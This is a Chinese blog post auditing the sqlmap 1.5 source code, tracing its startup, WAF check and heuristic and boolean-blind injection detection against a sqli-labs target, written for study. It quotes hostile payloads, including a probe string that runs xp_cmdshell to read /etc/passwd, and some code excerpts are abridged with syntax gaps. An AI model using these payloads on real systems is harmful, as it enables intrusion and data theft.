SQLmap源码审计
本文最后更新于 354 天前,其中的信息可能已经有所发展或是发生改变。

SQLmap是一款优秀的开源渗透测试工具,亦是一项优秀的软件工程,想一次读懂SQLmap显然是非常难的,可能自己以后会写很多篇文章,直到读懂了代码为止吧。

环境

SQLmap 1.5.0

sqli-labs level 1

前置流程分析

先从最简单的参数开始吧,当我们尝试只提交-u时,打下断点,观察整个SQLmap的响应流程。

python .\sqlmap.py -u http://2b1dd5bd-c4a9-488b-8650-57cc233d78da.node4.buuoj.cn/Less-1/?id=2

入口函数

路由在sqlmap.py中,观察main中的执行流程,该try-catch逻辑中主要捕捉的错误时ctrl+c以及系统终端进程的异常退出,最后停止所有线程的执行。

其中,sys.exit()调用后会引发SystemExit异常,可以捕获此异常做清理工作,用于在主线程中退出;os._exit()直接将python解释器退出,余下的语句不会执行,用于在线程中退出。

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        pass
    except SystemExit:
        raise
    except:
        traceback.print_exc()
    finally:
        # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
        if threading.activeCount() > 1:
            os._exit(getattr(os, "_exitcode", 0))
        else:
            sys.exit(getattr(os, "_exitcode", 0))
else:
    # cancelling postponed imports (because of Travis CI checks)
    __import__("lib.controller.controller")

跟进main(),首先调用dirtyPathches()函数,主要是打一些适配补丁

对于httplib 接收长结果设置兼容

    _http_client._MAXLINE = 1 * 1024 * 1024

在 sqlmap 分块的情况下防止双分块编码

    if six.PY3:
        if not hasattr(_http_client.HTTPConnection, "__send_output"):
            _http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output

        def _send_output(self, *args, **kwargs):
            if conf.get("chunked") and "encode_chunked" in kwargs:
                kwargs["encode_chunked"] = False
            self.__send_output(*args, **kwargs)

        _http_client.HTTPConnection._send_output = _send_output

在Windows系统上添加对inet_pton()函数的支持。

    if IS_WIN:
        from thirdparty.wininetpton import win_inet_pton

接着进入resolveCrossReferences(),这里负责解决交叉引用的地方(虽然不太理解,但是赋值就完事了)

def resolveCrossReferences():
    """
    Place for cross-reference resolution
    """

    lib.core.threads.isDigit = isDigit
    lib.core.threads.readInput = readInput
    lib.core.common.getPageTemplate = getPageTemplate
    lib.core.convert.filterNone = filterNone
    lib.core.convert.isListLike = isListLike
    lib.core.convert.shellExec = shellExec
    lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
    lib.core.option._pympTempLeakPatch = pympTempLeakPatch
    lib.request.connect.setHTTPHandlers = _setHTTPHandlers
    lib.utils.search.setHTTPHandlers = _setHTTPHandlers
    lib.controller.checks.setVerbosity = setVerbosity
    lib.utils.sqlalchemy.getSafeExString = getSafeExString
    thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode

checkEnvironment()负责检测环境,并将环境变量等将一些全局使用的变量加载到全局。这里检测了包括编码异常,版本等信息,最后如果sys.modules字典导入了sqlmap.sqlmap那么就对应的获取把data异常都加载到全局,其中data里面是各种多各个文件共享的一些变量。

def checkEnvironment():
    try:
        os.path.isdir(modulePath()
    except UnicodeEncodeError:
        errMsg = "your system does not properly handle non-ASCII paths. "
        errMsg += "Please move the sqlmap's directory to the other location"
        logger.critical(errMsg)
        raise SystemExit

    if distutils.version.LooseVersion(VERSION) < distutils.version.LooseVersion("1.0"):
        errMsg = "your runtime environment (e.g. PYTHONPATH) is "
        errMsg += "broken. Please make sure that you are not running "
        errMsg += "newer versions of sqlmap with runtime scripts for older "
        errMsg += "versions"
        logger.critical(errMsg)
        raise SystemExit

    # Patch for pip (import) environment
    if "sqlmap.sqlmap" in sys.modules:
        for _ in ("cmdLineOptions", "conf", "kb"):
            globals()[_] = getattr(sys.modules["lib.core.data"], _)

        for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
            globals()[_] = getattr(sys.modules["lib.core.exception"], _)

执行到setPaths(modulePath()),其中传入的modulePath()是sqlmap脚本的绝对路径,在该函数中初始化paths变量,并且加载其他文件的相对路径为绝对路径,最后调用checkFile检查文件是否正常。

        setPaths(modulePath())

最后banner()打印sqlmap的指纹信息。

def banner():
    """
    This function prints sqlmap banner with its version
    """

    if not any(_ in sys.argv for _ in ("--version", "--api")) and not conf.get("disableBanner"):
        result = BANNER

        if not IS_TTY or any(_ in sys.argv for _ in ("--disable-coloring", "--disable-colouring")):
            result = clearColors(result)
        elif IS_WIN:
            coloramainit()

        dataToStdout(result, forceOutput=True)

原始命令行数据获取

获取原始的命令行数据并存入字典,其中cmdLineOptions是自定义的字典类,继承自字典并封装,用于存储数据。其中命令行全部配置在/lib/parse/cmdline.py中,之后会对args进行初始化。

        # Store original command line options for possible later restoration
        args = cmdLineParser()
        cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args)
        initOptions(cmdLineOptions)

接着进入initOptions()进行初始化,调用三个函数,_setConfAttributes初始化conf的参数,_setKnowledgeBaseAttributes()将初始化的值赋值给knowledge base_mergeOptions()将命令行选项与配置文件和默认选项合并。

def initOptions(inputOptions=AttribDict(), overrideOptions=False):
    _setConfAttributes()
    _setKnowledgeBaseAttributes()
    _mergeOptions(inputOptions, overrideOptions)

api判断

判断是否是api,如果是的话就会重新加载输出流和错误。

        if conf.get("api"):
            # heavy imports
            from lib.utils.api import StdDbOut
            from lib.utils.api import setRestAPILog

            # Overwrite system standard output and standard error to write
            # to an IPC database
            sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
            sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
            setRestAPILog()

init

init的过程比较复杂,具体看一个师傅(见参考)的解析吧。

def init():
    """
    Set attributes into both configuration and knowledge base singletons
    based upon command line and configuration file options.
    """
    # 设置属性,基于命令行和配置文件选项。
    _useWizardInterface() # 用户向导程序
    setVerbosity() # 设置debug等级
    _saveConfig() # 将命令行选项保存到sqlmap配置INI文件中
    _setRequestFromFile() # 设置http请求从文件中
    _cleanupOptions() # 清理配置选项
    _cleanupEnvironment() # 清理环境
    _dirtyPatches() # 补丁相关
    _purgeOutput() # 安全删除(purges)输出目录。
    _checkDependencies() # 检测丢失的依赖
    _createTemporaryDirectory() # 创建运行的临时目录
    _basicOptionValidation() # 检测选项是否有效
    _setProxyList() # 设置代理列表
    _setTorProxySettings() # 设置Tor代理
    _setDNSServer() # 设置DNS服务器
    _adjustLoggingFormatter() # 调整日志格式
    _setMultipleTargets() # 如果在多个目标中运行,只定义一种参数
    _setTamperingFunctions() # 设置tamper脚本
    _setWafFunctions() # 载入waf检测脚本
    _setTrafficOutputFP() # 设置记录http日志文件
    _setupHTTPCollector() # 清理http收集
    _resolveCrossReferences()
    _checkWebSocket() # 检测websocket-client模块调用
    parseTargetUrl() # 解析目标url
    parseTargetDirect() # 解析目标DBMS
    if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)):
        # 如果设置了上述选项,配置相关http
        _setHTTPTimeout() # 设置超时
        _setHTTPExtraHeaders() # 设置Headers
        _setHTTPCookies() # 设置Cookies
        _setHTTPReferer() # 设置Referer
        _setHTTPHost() # 设置Host
        _setHTTPUserAgent() # 设置UserAgent
        _setHTTPAuthentication() # 设置HTTPAuthentication
        _setHTTPHandlers() # 检查并设置所有HTTP请求的HTTP / SOCKS代理。
        _setDNSCache() # 设置DNS缓存
        _setSocketPreConnect()
        _setSafeVisit() # 检查并设置安全访问选项。
        _doSearch() # 使用搜索平台搜索结果并存储
        _setBulkMultipleTargets()
        _setSitemapTargets() # 解析SitemapTargets中的目标
        _checkTor() # 检测Tor
        _setCrawler() # 设置爬虫
        _findPageForms() # 寻找网页的表单
        _setDBMS() # 强制DBMS选项
        _setTechnique()
    _setThreads() # 设置现场
    _setOS() # 强制OS
    _setWriteFile() # 写入文件
    _setMetasploit() # Metasploit相关设置
    _setDBMSAuthentication()
    loadBoundaries() # 载入Boundaries
    loadPayloads() # 载入Payloads
    _setPrefixSuffix() # 设置前后缀
    update() # 更新sqlmap
    _loadQueries() # 加载查询的xml /查询

功能测试

对每个更新后的功能进行测试,包括覆盖测试、功能测试、fuzz测试等等,确保功能能正常使用,否则异常退出。之后初始化target变量后进行start()

        if not conf.updateAll:
            # Postponed imports (faster start)
            if conf.smokeTest:
                from lib.core.testing import smokeTest
                os._exitcode = 1 - (smokeTest() or 0)
            elif conf.vulnTest:
                from lib.core.testing import vulnTest
                os._exitcode = 1 - (vulnTest() or 0)
            elif conf.bedTest:
                from lib.core.testing import bedTest
                os._exitcode = 1 - (bedTest() or 0)
            elif conf.fuzzTest:
                from lib.core.testing import fuzzTest
                fuzzTest()

Start流程分析

我使用的是sqlmap1.5版本,start()函数在lib/controller/controller.py中,从269行开始,到765行结束,包含了后续所有SQL注入的测试内容,代码比较多,需要进行比较长的分析。

第一个if语句创建文件的hashFile,如果提交的命令行参数中有-d参数,调用函数initTargetEnv()、setupTargetEnv()、action(),最后返回True。

    if conf.hashFile:
        crackHashFile(conf.hashFile)

    if conf.direct:
        initTargetEnv()
        setupTargetEnv()
        action()
        return True

initTargetEnv()

该函数会初始化目标环境,对参数进行赋空值或重置、设置用户指定的DBMS、对data中的参数进行urlencode编码(如果指定了urldecode则不编码)。

def initTargetEnv():
    """
    Initialize target environment.
    """

    if conf.multipleTargets:
        if conf.hashDB:
            conf.hashDB.close()

        if conf.cj:
            resetCookieJar(conf.cj)

        conf.paramDict = {}
        conf.parameters = {}
        conf.hashDBFile = None

        _setKnowledgeBaseAttributes(False)
        _restoreMergedOptions()
        _setDBMS()

    if conf.data:
        class _(six.text_type):
            pass

        kb.postUrlEncode = True

        for key, value in conf.httpHeaders:
            if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():
                kb.postUrlEncode = "urlencoded" in value
                break

        if kb.postUrlEncode:
            original = conf.data
            conf.data = _(urldecode(conf.data))
            setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
            kb.postSpaceToPlus = '+' in original

    match = re.search(INJECT_HERE_REGEX, "%s %s %s" % (conf.url, conf.data, conf.httpHeaders))
    kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR

setupTargetEnv()

设置一些目标测试相关的环境文件等。

def setupTargetEnv():
    _createTargetDirs() # 创建输出的目录
    _setRequestParams()
    # 检查请求参数,获取get参数 还有POST方式的附加--data的内容
    # 检索注入标记符并给出提示询问是否对标记点检测注入
    # 根据上面的注入标记法来操作
    _setHashDB()
    # session.sqlite 对这个会话存储的设置和检查
    _resumeHashDBValues()
    # 对session.sqlite基本历史信息的读入 数据库类型
    _setResultsFile()
    # 创建保存多目标模式输出结果的文件
    _setAuthCred()
    # 将当前目标的身份验证凭据(如果有)添加到密码管理器
    _setAuxOptions()
    # 设置辅助(主机相关)选项

action()

利用受影响URL参数上的SQL注入,并尽可能从后端数据库管理系统或操作系统提取请求的数据。

离开action()后往下。接着解析输入的参数,包括多个url

    if conf.configFile and not kb.targets:
        errMsg = "you did not edit the configuration file properly, set "
        errMsg += "the target URL, list of targets or google dork"
        logger.error(errMsg)
        return False

    if kb.targets and isListLike(kb.targets) and len(kb.targets) > 1:
        infoMsg = "found a total of %d targets" % len(kb.targets)
        logger.info(infoMsg)

接着初始化header,最后进入循环。

    initialHeaders = list(conf.httpHeaders)

检查网络连接

            if conf.checkInternet:
                infoMsg = "checking for Internet connection"
                logger.info(infoMsg)

                if not checkInternet():
                    warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X")
                    dataToStdout(warnMsg)

                    valid = False
                    for _ in xrange(conf.retries):
                        if checkInternet():
                            valid = True
                            break
                        else:
                            dataToStdout('.')
                            time.sleep(5)

                    if not valid:
                        errMsg = "please check your Internet connection and rerun"
                        raise SqlmapConnectionException(errMsg)
                    else:
                        dataToStdout("\n")

将测试目标的参数解析到conf中存储

            conf.url = targetUrl
            conf.method = targetMethod.upper().strip() if targetMethod else targetMethod
            conf.data = targetData
            conf.cookie = targetCookie
            conf.httpHeaders = list(initialHeaders)
            conf.httpHeaders.extend(targetHeaders or [])
            conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]

之后设置header,初始化target目标环境,parseTargetUrl()解析url参数,进入正则匹配,判断参数是否测试过,如果没测试过,设置testSqlInj为True,并跳出循环。

            testSqlInj = False

            if PLACE.GET in conf.parameters and not any((conf.data, conf.testParameter)):
                for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
                    paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])

                    if paramKey not in kb.testedParams:
                        testSqlInj = True
                        break
            else:
                paramKey = (conf.hostname, conf.path, None, None)
                if paramKey not in kb.testedParams:
                    testSqlInj = True

确认参数是否已经使用过注入,以及如果测试过就跳过。后面进行url其他参数判断

            if testSqlInj and conf.hostname in kb.vulnHosts:    
                if kb.skipVulnHost is None:
                    message = "SQL injection vulnerability has already been detected "
                    message += "against '%s'. Do you want to skip " % conf.hostname
                    message += "further tests involving it? [Y/n]"

                    kb.skipVulnHost = readInput(message, default='Y', boolean=True)

                testSqlInj = not kb.skipVulnHost

            if not testSqlInj:
                infoMsg = "skipping '%s'" % targetUrl
                logger.info(infoMsg)
                continue

进入checkWAF()

checkWAF()

sqlmap的checkWAF有一套完备的实现流程,实现check的payload:

IPS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"

通过第三方data.json中的数据,正则匹配来识别每一个waf的种类

payload是一个随机数字与上面的WAF——IPS_WAF_CHECK_PAYLOAD。

    payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)

    if PLACE.URI in conf.parameters:
        place = PLACE.POST
        value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
    else:
        place = PLACE.GET
        value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
        value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))

对payload标识符进行替换生成随机字符串、数字等,返回相似度,以及是否匹配特征值。响应时间超过设置的阈值,则证明有waf

    try:
        retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO
    except SqlmapConnectionException:
        retVal = True
    finally:
        kb.matchRatio = None

接着,连续访问页面,测试请求的延时,如果延迟较小,则证明是稳定的。

            if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
                if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.technique:
                    # NOTE: this is not needed anymore, leaving only to display
                    # a warning message to the user in case the page is not stable
                    checkStability()

对测试列表进行排序

                # Do a little prioritization reorder of a testable parameter list
                parameters = list(conf.parameters.keys())

                # Order of testing list (first to last)
                orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)

后面根据测试的level参数来设定需要测定哪些参数,检测参数是否被注入过,然后进行注入

heuristicCheckSqlInjection()

通过插入例如单双引号,通过观察返回页面的返回值异常、报错行为,来确定是否存在注入点。

def heuristicCheckSqlInjection(place, parameter):

    origValue = conf.paramDict[place][parameter] # '1' ?id=1
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place # GET
    # 前后缀 这里的前后缀类似下面的正式注入的边界前后缀
    prefix = ""
    suffix = ""
    randStr = ""

    if conf.prefix or conf.suffix: # 都是空 配置的 
        if conf.prefix:
            prefix = conf.prefix

        if conf.suffix:
            suffix = conf.suffix

    while randStr.count('\'') != 1 or randStr.count('\"') != 1: # randStr 生成的启发式payload 单引号的个数不等于或者双引号的个数不等于1
        # 返回具有给定字符数的随机字符串值
        # 长度10 HEURISTIC_CHECK_ALPHABET
        # HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') 双引号 单引号 左右括号  逗号 点
        # 随机生成长度为10 的 以上面的为选择的字符串
        randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
        # 例如这样 '),)\'.",(.)'
    # 启发式模式
    kb.heuristicMode = True
    # 设置payload 是将前后缀与 随机字符串拼接
    payload = "%s%s%s" % (prefix, randStr, suffix)
    # 直接就是 randStr
    payload = agent.payload(place, parameter, newValue=payload)
    # 合成半payload 传入 请求类型 测试的参数 上面随机的value值
    # u'id=__PAYLOAD_DELIMITER__1),)\'.",(.)__PAYLOAD_DELIMITER__' 
    # id=1 等于后插入payload分隔符 1后面再加上 随机字符串 然后再payload分隔符
    page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
    # 这里只是 u'1(("()\'.(..' 最后编码为 '1%28%28%22%28%29%27.%28..'
    kb.heuristicPage = page
    kb.heuristicMode = False

    parseFilePaths(page)
    # 通过返回页面获取可能的路径 也是正则匹配
    result = wasLastResponseDBMSError()
    # 页面是不是有可识别的数据库报错的匹配 有的话返回True 正则匹配页面来获取


    def _(page):
         # 返回 正常页面没有异常字符串 但是启发式请求的返回有异常字符串
         # 'java.lang.NumberFormatException', 'ValueError: invalid literal', 'TypeMismatchException', 'CF_SQL_INTEGER', ' for CFSQLTYPE ', 'cfqueryparam cfsqltype', 'InvalidParamTypeException',
        return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)

    casting = _(page) and not _(kb.originalPage) # 有就True  我们这里没有就 False

    # 这里是启发式判断是否有 数据库报错获取数据库类型 代码的执行的错误

    if not casting and not result and kb.dynamicParameter and origValue.isdigit():
        # 上面的没有报错的话走这个 
        randInt = int(randomInt())
        payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix)
        payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
        result = Request.queryPage(payload, place, raise404=False) # 比较页面是否相似

        if not result:
            # 再不成的话换成字符串再请求一次
            randStr = randomStr()
            payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
            payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
            casting = Request.queryPage(payload, place, raise404=False)

    kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE
    # 根据上面是否匹配了一些异常 数据库报错异常 页面相似度来确认是否可能存在注入
    elif result: # 这里就是从页面返回了数据库类型的报错 于是输出可能是注入的
        infoMsg += "be injectable"
        if Backend.getErrorParsedDBMSes():
            infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes()
        logger.info(infoMsg)

    else:
        infoMsg += "not be injectable"
        logger.warn(infoMsg)

    kb.heuristicMode = True # 设置启发式检测模式为 True
    # xss检测 就是对 '<\'">'  在也没又显示匹配上了
    randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)
    # 获取两个6位的随机字符串
    # ('xFyTsk', 'rHcreG')
    value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
    # DUMMY_NON_SQLI_CHECK_APPENDIX = '<\'">'   这个就可以看出来就是xss检测了
    payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
    # '\'xFyTsk<\'">rHcreG'
    payload = agent.payload(place, parameter, newValue=payload)
    page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)

    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
    # 存在的话就胡输出可能存在 xss  
    if value.lower() in (page or "").lower(): # 如果这个 value 还在返回的页面就可能存在xss
        infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
        infoMsg += "'%s' might be vulnerable to cross-site scripting (XSS) attacks" % parameter
        logger.info(infoMsg)
    # 还可能存在文件包含的一些特征
    for match in re.finditer(FI_ERROR_REGEX, page or ""):
        # FI_ERROR_REGEX '(?i)[^\\n]{0,100}(no such file|failed (to )?open)[^\\n]{0,100}'
        # 可能存在文件包含
        if randStr1.lower() in match.group(0).lower():
            infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
            infoMsg += "'%s' might be vulnerable to file inclusion (FI) attacks" % parameter
            logger.info(infoMsg)
            break

    kb.heuristicMode = False

    return kb.heuristicTest

checkSqlInjection()

正式注入检测,尝试测试多种注入方法,观察返回值的不同提取注入点信息等。

def checkSqlInjection(place, parameter, value):
    #在这里存储有关边界和有效载荷的详细信息
    # 这里继承了 AttribDict 就封装的字典用于存储一些注入成功的数据
    injection = InjectionDict()

    # 加载当前线程数据
    threadData = getCurrentThreadData()
    # 调整边界顺序
    # 如果参数的value只是数字类型的 调整下排序顺序 数字的在前面如果是数字
    if value.isdigit():
        kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
        boundaries = kb.cache.intBoundaries
    elif value.isalpha():
        kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
        boundaries = kb.cache.alphaBoundaries
    else:
        boundaries = conf.boundaries

    # 设置测试True
    kb.testMode = True

    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
    tests = getSortedInjectionTests()
    # 这里根据上面数据库报错的类型确实的数据库的优先级返测试列表 调整的是顺序
    # 每一条如下
    # {'risk': 1, 危险程度 比如数据库删除就比较高 参数的时候也可以配置
    # 'title': 'AND boolean-based blind - WHERE or HAVING clause', 测试输出的标题
    # 'clause': [1, 8, 9],
    # 'level': 1, 级别
    # 'request': {'payload': 'AND [RANDNUM]=[RANDNUM]'}, 请求的payload
    # 'vector': 'AND [INFERENCE]',
    # 'where': [1],
    # 'response': {
    #     'comparison': 'AND [RANDNUM]=[RANDNUM1]'
    #     },
    # 'stype': 1}
    seenPayload = set()
    # 设置默认随机数字和随机字符串10位长度
    kb.data.setdefault("randomInt", str(randomInt(10)))
    kb.data.setdefault("randomStr", str(randomStr(10)))

    while tests:
        test = tests.pop(0)

        try:
            if kb.endDetection:
                break

            title = test.title # 'AND boolean-based blind - WHERE or HAVING clause'
            kb.testType = stype = test.stype # 1

            # 1: Boolean-based blind SQL injection
            # 2: Error-based queries SQL injection
            # 3: Inline queries SQL injection
            # 4: Stacked queries SQL injection
            # 5: Time-based blind SQL injection
            # 6: UNION query SQL injection

            clause = test.clause # [1, 8, 9]
            #payload在哪个位置生效  
            # 0: Always
            # 1: WHERE / HAVING
            # 2: GROUP BY
            # 3: ORDER BY
            # 4: LIMIT
            # 5: OFFSET
            # 6: TOP
            # 7: Table name
            # 8: Column name
            # 9: Pre-WHERE (non-query)

            unionExtended = False
            trueCode, falseCode = None, None

            # 联合查询
            if stype == PAYLOAD.TECHNIQUE.UNION: # 6 union联合查询 我们这条测试语句是1
                configUnion(test.request.char)

                if "[CHAR]" in title:
                    if conf.uChar is None:
                        continue
                    else:
                        title = title.replace("[CHAR]", conf.uChar)

                elif "[RANDNUM]" in title or "(NULL)" in title:
                    title = title.replace("[RANDNUM]", "random number")

                if test.request.columns == "[COLSTART]-[COLSTOP]":
                    if conf.uCols is None:
                        continue
                    else:
                        title = title.replace("[COLSTART]", str(conf.uColsStart))
                        title = title.replace("[COLSTOP]", str(conf.uColsStop))

                elif conf.uCols is not None:
                    debugMsg = "skipping test '%s' because the user " % title
                    debugMsg += "provided custom column range %s" % conf.uCols
                    logger.debug(debugMsg)
                    continue

                match = re.search(r"(\d+)-(\d+)", test.request.columns)
                if match and injection.data:
                    lower, upper = int(match.group(1)), int(match.group(2))
                    for _ in (lower, upper):
                        if _ > 1:
                            __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
                            unionExtended = True
                            test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
                            title = re.sub(r"\b%d\b" % _, str(__), title)
                            test.title = re.sub(r"\b%d\b" % _, str(__), test.title)

            #如果用户只想测试特定的类型
            if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech:
                debugMsg = "skipping test '%s' because the user " % title
                debugMsg += "specified to test only for "
                debugMsg += "%s techniques" % " & ".join(PAYLOAD.SQLINJECTION[_] for _ in conf.tech)
                logger.debug(debugMsg)
                continue

            #如果已经是相同的sql注入类型,则跳过测试
            #由另一个测试确定
            if injection.data and stype in injection.data:
                debugMsg = "skipping test '%s' because " % title
                debugMsg += "the payload for %s has " % PAYLOAD.SQLINJECTION[stype]
                debugMsg += "already been identified"
                logger.debug(debugMsg)
                continue

            #分析DBMS特定有效负载的详细信息
            if "details" in test and "dbms" in test.details:
                payloadDbms = test.details.dbms
            else:
                payloadDbms = None

            # 这里省略了各种跳过一些测试的判断


            if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                # 高过配置的危险级别不执行
                if test.risk > conf.risk:
                    debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
                    debugMsg += "is higher than the provided (%d)" % conf.risk
                    logger.debug(debugMsg)
                    continue
                # 还要对于 level 等级进行限制
                if test.level > conf.level:
                    debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
                    debugMsg += "is higher than the provided (%d)" % conf.level
                    logger.debug(debugMsg)
                    continue

            
            # 输出测试标题
            infoMsg = "testing '%s'" % title
            logger.info(infoMsg)

            #根据当前测试dbms值强制后端dbms
            #正确的有效载荷
            # 根据启发式获取的数据库类型来配置到 Backend
            Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)

            #  comment 是空  因为 test.request 是 {'payload': 'AND [RANDNUM]=[RANDNUM]'}
            comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
            fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
            # 这里面对标识符进行替换 这里是 RANDNUM 换为随机数字
            # 最后获取 fstPayload 'AND 7282=7282'
            # 这个边界 就是各种闭合的  ' and '1'='1  闭合单引号
            for boundary in boundaries:
                injectable = False

                if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
                    continue
                # 字段 要匹配上才可以 test的生效字段和 边界的
                clauseMatch = False

                for clauseTest in test.clause:
                    if clauseTest in boundary.clause:
                        clauseMatch = True
                        break

                if test.clause != [0] and boundary.clause != [0] and not clauseMatch:
                    continue

                whereMatch = False

                for where in test.where:
                    if where in boundary.where:
                        whereMatch = True
                        break

                if not whereMatch:
                    continue

                    # 对 payload进行去重 正则去掉 数字等变量
                    if fstPayload:
                        boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
                        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                        reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
                        # reqPayload= u'id=__PAYLOAD_DELIMITER__1) AND 7282=7282 AND (5049=5049__PAYLOAD_DELIMITER__'
                        # 这里对测试语句进行payload标识位置
                        if reqPayload:
                            stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", reqPayload)
                            if stripPayload in seenPayload:
                                # stripPayload = u'id=__PAYLOAD_DELIMITER__.) AND .=. AND (.=.__PAYLOAD_DELIMITER__'
                                continue
                            else:
                                seenPayload.add(stripPayload)
                    else:
                        reqPayload = None

                    # 执行测试请求并检查
                    #分析测试的<response>
                    for method, check in test.response.items():
                        check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)

                        # 布尔盲注
                        if method == PAYLOAD.METHOD.COMPARISON:
                            # Generate payload used for comparison
                            def genCmpPayload():
                                sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)

                                # Forge response payload by prepending with
                                # boundary's prefix and appending the boundary's
                                # suffix to the test's ' <payload><comment> '
                                # string
                                boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)
                                boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                                cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)

                                return cmpPayload

                            # Useful to set kb.matchRatio at first based on
                            # the False response content
                            kb.matchRatio = None
                            kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
                            # 传入的 u'id=__PAYLOAD_DELIMITER__1) AND 9287=9488 AND (8325=8325__PAYLOAD_DELIMITER__'
                            Request.queryPage(genCmpPayload(), place, raise404=False)
                            falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
                            falseRawResponse = "%s%s" % (falseHeaders, falsePage)

                            # Perform the test's True request
                            # true
                            trueResult = Request.queryPage(reqPayload, place, raise404=False)
